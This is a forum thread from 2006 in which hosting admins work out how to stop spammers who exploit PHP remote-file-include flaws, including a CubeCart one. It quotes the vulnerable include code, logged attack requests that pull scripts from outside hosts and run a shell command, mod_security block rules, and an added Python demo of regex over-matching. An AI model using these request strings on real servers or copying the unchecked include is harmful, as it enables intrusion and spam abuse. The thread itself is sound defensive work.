Spammer - loading external php scripts

Discussion in 'General Discussion' started by jeroman8, Mar 13, 2006.

  1. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    I have spammers using a PHP script on my server to load external PHP scripts and commands. They send out phishing spam.
    I found the lines below in domlogs; the blog.php script in them is a PHP mailer script.

    Is it an exploit in the local PHP script that makes this possible?
    The only PHP in this file is:

    <?PHP
    // The page to include is taken straight from the query string...
    $page = $_GET['page'];
    if (empty($page)) {
        $page = "start.inc";
    }
    // ...and handed to include unchecked, so a remote URL is fetched and
    // executed as PHP on this server when remote includes are enabled.
    include $page;
    ?>


    In domlogs:

    GET /index2.php?page=http://geocities.com/singapore_bm/abouts.php?act=cmd&d=%2Fhome%2Fwoddo%2Fpublic_html%2Fsdagen%2F&cmd=find+.%2F+-perm+777+-type+d&cmd_txt=1&submit=Execute

    GET index2.php?act=cmd&d=%2Fhome%2Fwoddo%2Fpublic_html%2Fsdagen%2F&cmd=find+.%2F+-perm+777+-type+d&cmd_txt=1&submit=Execute

    POST index2.php?page=http://geocities.com/singapore_bm/blog.php?


    I have the HostMerit mod_sec rules and have now also blocked geocities along with
    cmd_txt and perm+777. But I don't know if that stops it.
     
  2. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Add this to my security ruleset to deal with those wankers, if it isn't in there already.

    SecFilter "act=cmd"
    SecFilter "page=http"
    SecFilter "geocities\.com"
     
  3. HostMerit

    Also, the flaw is in that bit of PHP coding. It will more or less include anything 'fed' into it, parsing it as PHP on your server; aka their spamming script, etc., will run off your server. It also looks like they were looking for chmod 777 files, for a possible defacing attack. In addition to the rules, suspend the account and contact the user, as well as clearing your exim queue and restarting Apache, to clear old httpd spamming processes and load the new rules.

    Hope that helps. ;)
     
  4. jeroman8

    Thanks!

    Do you have a rule for the current CubeCart exploit?
    I have been hit twice now and am doing the patches described in the CubeCart forum,
    but I have a lot of CubeCart clients, so blocking it in mod_sec would be really great!

    /usr/local/apache/domlogs/xxxx.se:81.199.198.80 - - [30/Mar/2006:10:22:31 +0200] "GET /shop/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob%5brootDir%5d=http://telo.to.md/blog2.txt? HTTP/1.1" 200 5109 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

    I can block the included URLs but not much more, since including other URLs
    is used by clients in their blogs and forums etc.
    I have been thinking about blocking this option and the clients would just have to do without it, but many clients use us because the other hosts in Sweden are really hard on security when it comes to PHP, disabling almost everything.

    I will try a few things myself and test them, but I don't know how it will affect other clients
    running other stuff.
    For example, block "rootDir", but that is maybe used in other scripts...
     
  5. HostMerit

    I found these starting two days ago and personally used:

    #March 29
    SecFilter "orderSuccess\.inc\.php?" chain
    SecFilter "=http"

    SecFilter "[rootDir]=http"
    SecFilterSelective THE_REQUEST "rootDir"
    SecFilter "cart_order_id=1"


    The newest version of my mod_security config is at: http://www.hostmerit.com/modsec.user.conf

    Comments, etc, welcome.
     
    #5 HostMerit, Mar 30, 2006
    Last edited: Mar 30, 2006
  6. jeroman8

    Much appreciated - thank you!!!

    I have been trying myself, but since I do not know the rules/commands I was afraid of blocking other stuff users might need.

    SecFilter "=http" - this looks like it should block other scripts' "include" functions.
    For example, a forum that loads smileys from an image server etc.
    I guess it's enough with SecFilterSelective THE_REQUEST "rootDir" if they must
    use that one to do it.
    I did not find any rootDir in domlogs except on the spammer site, so it seems
    safe to have that rule.

    But I use all of them for now, clients may complain and then we take it from there.

    Thanks again!

    Regards Jerry
     
  7. HostMerit

    If you'll notice, that's a chain to the rule above it.

    SecFilter "orderSuccess\.inc\.php?" chain
    SecFilter "=http"

    So if it's orderSuccess.inc.php being called and the request includes =http, it will be blocked. (Hence a chained rule) :p
     
  8. jeroman8

    Hi!

    SecFilter "[rootDir]=http" - this is blocking a lot of POST commands, and many clients
    have trouble and errors.

    For example, the regular "FormMail" in cgi-sys is down.
    The osCommerce checkout function etc. is being blocked!!
    The banner program is down for including external banners.
    And many other things.
    I guess [rootDir]=http means more than just exactly that word or those characters.

    Your clients must have noticed this?
    I had to remove it, and I hope the rest of the CubeCart rules will be enough.
     
    #8 jeroman8, Apr 2, 2006
    Last edited: Apr 3, 2006
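Added example, not code from the thread or from the HostMerit ruleset: a small Python emulation of why the "[rootDir]=http" filter from post #5 over-matches and the chained orderSuccess rule does not. SecFilter patterns in mod_security 1.x are regular expressions, so unescaped brackets form a character class (any one of r, o, t, D, i followed by "=http") rather than the literal text; it is assumed here that the engine matches against the URL-decoded request, and the FormMail/banner/forum request lines are constructed stand-ins for the kinds of traffic post #8 reports as blocked.

```python
import re
from urllib.parse import unquote

# Filters as posted in the thread (SecFilter takes a regular expression).
POSTED_RULE = r"[rootDir]=http"      # unescaped brackets: a character class
ESCAPED_RULE = r"\[rootDir\]=http"   # literal brackets: what was intended
SELECTIVE_RULE = r"rootDir"          # SecFilterSelective THE_REQUEST "rootDir"
CHAIN_RULE = (r"orderSuccess\.inc\.php?", r"=http")  # post #5 chain: both must match

# Request line from the domlog quoted in post #4.
ATTACK = ("GET /shop/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1"
          "&glob%5brootDir%5d=http://telo.to.md/blog2.txt? HTTP/1.1")
# Constructed benign requests (parameter names are assumptions, not from the thread).
BENIGN = [
    "POST /cgi-sys/FormMail.pl?redirect=http://example.test/ok.html HTTP/1.1",  # 't=http'
    "GET /banners/show.php?logo=http://example.test/ad.gif HTTP/1.1",          # 'o=http'
    "GET /forum/index.php?smiley=http://example.test/s.gif HTTP/1.1",          # 'y' not in class
]


def normalize(request: str) -> str:
    """Assumed engine behaviour: filters see the URL-decoded request."""
    return unquote(request)


def secfilter(pattern: str, request: str) -> bool:
    """Emulate SecFilter: a regex search anywhere in the normalized request."""
    return re.search(pattern, normalize(request)) is not None


def chain(patterns, request: str) -> bool:
    """Emulate a chained rule: every pattern must match for the request to be blocked."""
    return all(secfilter(p, request) for p in patterns)


def evaluate(request: str) -> dict:
    """Which of the thread's rules would block this request."""
    return {
        "posted": secfilter(POSTED_RULE, request),      # misses attack, hits benign
        "escaped": secfilter(ESCAPED_RULE, request),    # hits attack only
        "selective": secfilter(SELECTIVE_RULE, request),
        "chain": chain(CHAIN_RULE, request),
    }


if __name__ == "__main__":
    for r in [ATTACK] + BENIGN:
        print(evaluate(r), r.split()[1][:50])
```

In the decoded attack the character before "=http" is "]", which is not in the class, so the posted rule never fires on the exploit it was written for, while "redirect=http" and "logo=http" do trip it.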